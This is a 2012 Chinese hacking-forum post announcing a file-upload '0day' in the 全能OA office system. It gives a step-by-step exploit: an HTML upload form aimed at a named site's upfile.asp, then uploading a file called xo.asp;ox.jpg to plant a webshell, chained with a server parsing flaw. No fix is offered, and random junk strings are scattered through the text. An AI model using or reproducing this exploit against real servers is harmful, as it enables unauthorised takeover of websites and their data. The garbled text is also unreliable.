找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2158|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
全能OA办公系统 上传漏洞
" J0 g9 J" I6 t2 J3 M3 O
6 c) W! O8 e" m3 l系统介绍:! b( b: p, H5 k) p
/ N* i! y5 h1 C; m; _
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
7 p- z8 V! H; Z. Y# B1 p) r
, ?4 W" e' B3 S+ c2 X主要功能:
! X$ [% P' m* z! A8 f; K8 x公司通告
6 t6 `! y. X( V2 i- _. K- f1 p7 Z工作计划
$ @- t- \8 v" F- T9 e8 v. O通讯助理
5 \/ F! y' }& t1 t7 H4 M- H2 p; p客户资源 1 z7 d! U. ~) Z( A) r# t
我的公文
8 e+ L2 ^% M9 X+ Z0 |; U公文传阅 ( L1 l9 x. @  a3 U2 U
公共资源 ( v1 A; Z/ u% A3 F1 C0 w
资源预约
% I! Y. u+ P$ ]# x  z7 A今日考勤
8 p( T; T* Z% H- L个人计划 # c7 Z7 d, D+ \. x& ]( J$ l" A
个人通讯录
% P# U* Z% ?$ u, `5 N; d个人基本档案 4 J2 @' C( t1 m5 f
未读邮件
$ T" Q) ~/ l. J; m% Y6 b- _发邮件 / N3 ~0 L0 x$ e& [: I  P  c+ f
收件夹 8 R# t: {9 P" |: x- I
寄件夹
# N: _, d* H# H: H( c* M网络硬盘 9 b. Y6 P! C. O' p/ O
网络会议
' I" l/ @; K/ Q( Y! O; J: i% J" S网络调查
# U4 x7 O6 n5 D& d1 c+ y3 s& C$ }交流论坛
5 O  |* N6 H, a( l4 |
. {) W+ J- g2 d  Y+ N# b% R有兴趣测试的朋友可以下源码看看: _4 w! D- }" N. l# [6 G

! S; u9 B( Y) b5 D' p$ z* c/ F+ }3 Z源码下载:( N2 N$ h# E& H% U; u: G
8 b$ E) r; l/ E$ J% G; \
http://www.mycodes.net/30/4750.htm
- J5 k/ i6 A; w# ^
3 B+ m# Z9 |: e# B& r/ ?漏洞介绍:# a7 `8 B( o6 E; `+ E! ^
' ^4 X# U2 f: V3 D% j; E  [
由upfile.asp上传文件漏洞引起/ U# P  X4 n5 {# L3 M. \
# d- ]* h" u4 T! @3 B# F
测试方法:
( G7 ?$ M" ?" e1 l  G- w. A( P! [* D8 h# C7 l* |  v
使用名小子上传http://www.itlynn.com/upfile.asp即可& b( K" D" m$ A3 t3 Q$ U

% V+ E* E# @6 ?! i" `, o, V9 ^( b8 D如果upfile.asp文件被删除不存在。' c  v6 |0 F. u8 A6 ]

; @  g4 t, b: O0 Y$ x+ @  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp& P8 _" I9 ]" l" H2 c% G
% {4 j* P4 e4 P$ i( P, w. N2 _
如果存在那么将如下代码保存为upfile.html。9 k6 Q9 s0 L- e3 b
0 H8 V$ W- N% W" ^
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp* z5 }) e0 Y: @& r

% V7 J% K# w* C: e; V- z 8 ?7 Q. h" P" p! H) s4 i) T

2 B  }5 z" c7 i  D# N( t# s01 <table border='0' align="center" cellpadding="5"> ! L0 R1 }9 z  v" _. N% ~  b
. g3 a7 o; O( o; z
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 2 c" \3 L, |/ g& K$ K) S$ _3 F

1 K. |1 O; N" p7 Z03 <tr>
" F- ^) @/ Y4 T, J. X) Q) C3 l+ C& H6 [4 S
04             <td>报错:</td>
* X( V" E( Y; ~9 e- Y2 `% ]$ R1 U4 q4 x& v
05             <td><input type='radio' name='errnumber' value='0'> + y: V: A$ I1 S# x) f: I! |
5 u9 s% {3 j* a) N
06               自动更名
( H# r; A, z& R, N; o- |
( j% F% T' w4 `( X- c07               <input type='radio' name='errnumber' value='1' checked>
( `1 E  E) r- ?; i& I9 k
' c6 a  ^. V! K' U1 H6 ]4 H08               报错方式 ) i7 ^5 e: W: P# U! C+ M0 M3 w1 i
" ?7 \+ g3 P7 @' w8 M& D/ w% Z4 d/ P
09               <input type='radio' name='errnumber' value='2'> : g1 Z  v9 _3 s/ y9 h6 l

+ G" \! d& X, D4 L10               直接覆盖</td>
1 x5 j0 l4 i) b2 h# H8 K9 ]
9 p6 E( e( ?7 J11           </tr> * M: a/ T$ m9 a2 U" D
' }8 v, e% ]$ a+ h4 s5 `9 X4 N% w
12           <tr>
  Y5 A6 n0 D9 z1 v/ [, n+ C  \, p# Z7 p
13             <td>主题:</td>
8 T/ D& }+ v& i. M) H. S
$ l2 f5 P0 o0 J) t" Q' G, Y, z14             <td><input type='text' name='filename' size='30'></td>
, ]% x( q* N( E
# w" s' |0 Z' v/ `, |  m15           </tr>
+ g) E" N: v, F) E0 p3 }' s: ?0 W+ y) Z  t/ k9 Q& O" [6 s
16           <tr>
8 x- m3 N9 _  S* J& X; ]% q# K% v& y1 ~' N
17             <td>文件:</td>
* X9 H2 B1 J8 R1 Y/ t( ~6 \* U3 b4 A% I7 V
18             <td><input type="file"name="fruit"size="30"></td>
. x, {, c' J' a5 i4 B/ S
. s' h0 E7 v) R5 e" G' n* `) R19           </tr> 6 Q8 p+ J7 p+ J% n/ h5 O
. J' P! F- ?/ u+ G4 E* O
20           <tr> / A0 S+ x4 @. D  }# T8 N1 V9 J

2 a/ n( p4 ^+ h9 g1 a0 E21             <td valign='top'>简介:</td>
$ W8 [0 g( ^( y" D% e) ^, i2 i; y- y& z7 S8 m  m
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> # V  F2 f/ J( N+ p; U
+ |! [- |% f" m" K5 u
23           </tr>
$ [) P  U+ E& W9 x- y
; w- c  @$ [3 r# a24   7 y4 @) w; j( H7 N  z( c( a2 U
  K! G- h- n0 \+ x. Q* t; Y
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
* q- C7 e- o! S: q8 y2 Q% W, P  P& n% {3 t! a! S% M
26           </tr>
" D% Y$ i# [1 C4 ?# h; \3 k( v
8 O, }6 a' O) d. A1 f6 u% T27         </form> - O9 {; w4 t. d7 o8 P! x
6 \$ T$ k% I4 v% Y2 J
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
$ ~  H: D8 v# L$ r+ ^9 n" {5 X
, ^+ u& E6 ~' [1 C. x & V* U% m8 U% ]; x% F8 y% |
: R% a! L- X$ y; `7 P) E3 O. b
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg3 k- N. D- g1 V' X

2 A+ O, P4 [7 t( d3 v1 g此漏洞需要配合解析漏洞利用。5 p6 G1 q+ t9 C3 Q& f# Z, ^  i
! N4 Y; n! V- E/ b* g4 c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表